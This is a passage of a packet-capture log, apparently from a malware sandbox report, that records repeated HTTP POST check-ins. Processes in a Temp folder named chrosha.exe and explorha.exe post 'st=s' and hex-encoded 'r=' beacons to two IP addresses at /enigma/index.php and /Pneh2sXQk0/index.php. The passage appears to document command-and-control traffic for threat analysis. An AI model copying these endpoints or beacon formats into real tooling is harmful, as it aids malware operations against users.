                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:59.581497908 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
873 | 192.168.2.5 | 50722 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:59.702939987 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:59.954283953 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
874 | 192.168.2.5 | 50723 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:59.947932959 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:00.196017027 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
875 | 192.168.2.5 | 50724 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:00.211196899 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:00.467350960 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
876 | 192.168.2.5 | 50725 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:00.445892096 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:00.694122076 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
877 | 192.168.2.5 | 50726 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:00.824078083 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:01.072170019 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
878 | 192.168.2.5 | 50727 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:01.055386066 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:01.297883987 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
879 | 192.168.2.5 | 50728 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:01.327521086 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:01.581912994 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
880 | 192.168.2.5 | 50729 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:01.547175884 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:01.795555115 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
881 | 192.168.2.5 | 50730 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:01.943769932 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:02.191571951 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
882 | 192.168.2.5 | 50731 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:02.149661064 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:02.397720098 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
883 | 192.168.2.5 | 50732 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:02.440407991 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:02.690629959 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
884 | 192.168.2.5 | 50733 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:02.667876959 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:02.919490099 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
885 | 192.168.2.5 | 50734 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:03.054929972 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:03.299253941 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
886 | 192.168.2.5 | 50735 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:03.279337883 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:03.530123949 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
887 | 192.168.2.5 | 50736 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:03.559377909 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:03.815095901 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
888 | 192.168.2.5 | 50737 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:03.783452988 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:04.037173033 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
889 | 192.168.2.5 | 50738 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:04.182365894 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:04.432239056 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
890 | 192.168.2.5 | 50739 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:04.396481037 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:04.641068935 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
891 | 192.168.2.5 | 50740 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:04.681428909 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
